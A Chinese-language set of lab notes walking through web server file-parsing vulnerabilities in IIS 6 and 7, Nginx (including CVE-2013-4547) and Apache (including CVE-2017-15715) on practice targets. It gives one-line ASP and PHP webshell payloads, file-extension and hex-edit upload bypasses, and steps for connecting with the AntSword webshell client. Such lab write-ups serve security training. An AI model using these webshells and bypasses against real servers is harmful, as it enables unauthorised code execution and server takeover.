一:IIS
less-1 IIS6.X
步骤一:在iis的⽹站根⽬录新建⼀个名为x.asp的⽂件
步骤二:在x.asp中新建⼀个.txt⽂件,内容为<%=now()%> asp代码,更改后缀为jpg
步骤三:在外部浏览器进行访问Window2003的ip/x.asp/1.jpg,得出时间
步骤四:创建2.txt 输入asp一句话木马<%eval request("pass")%> 更改文件名后缀为.jpg
步骤五:进行访问
步骤六:进行蚁剑连接
less-2 IIS7.X
步骤一:配置 php.ini ⽂件,将 cgi.fix_pathinfo=1 取消掉...并重启....
步骤二:IIS --》 配置⽹站--》 处理程序映射--》 PHPStudy_FastCGI --》 请求限制 --》取消勾
步骤三:根目录下添加1.jpg
内容:<?php @eval($_POST[cmd]);?>
步骤四:访问1.jpg/.php
步骤五:进行蚁剑连接
二:Nginx
less-3 nginx_parsing_vulnerability
步骤一:开启靶场环境
步骤二:访问靶机地址
步骤三:创建lsz.jpg
步骤四:进行提交
进行访问/uploadfiles/c7ca40e5b7a0bb68db13aa890567898b.jpg
后添加/.php
步骤五:进行蚁剑连接
less-4 CVE-2013-4547
步骤一:开启靶场环境
步骤二:访问靶机并上传 shell.php 文件,抓包,修改⽂件后缀为.jpg,在.jpg后⾯添加两个空格并给上 .php 后缀
步骤三:在hex中将jpg后面第二个空格20改为00,放行
步骤四:访问上传后的文件,抓包
/uploadfiles/shell.jpg .php
三.Apache
less-5 apache_parsing
步骤一:开启靶场环境
步骤二:访问靶机并上传 lsz.php.jpg 文件,
进行访问:/uploadfiles/lsz.php.jpg
进行访问:/uploadfiles/lsz.php
步骤三:进行蚁剑连接
less-6 CVE-2017-15715
步骤一:开启靶场环境
步骤二:访问靶场环境
步骤三:访问靶机并上传 shell.jpg 文件,文件内容为GIF89a
<?php @eval($_POST['cmd']);?>,filename为1.php
步骤三:抓包,1.php后面加空格,hex中空格20改为0a
步骤四:放行访问1.php%0A
步骤五:进行蚁剑连接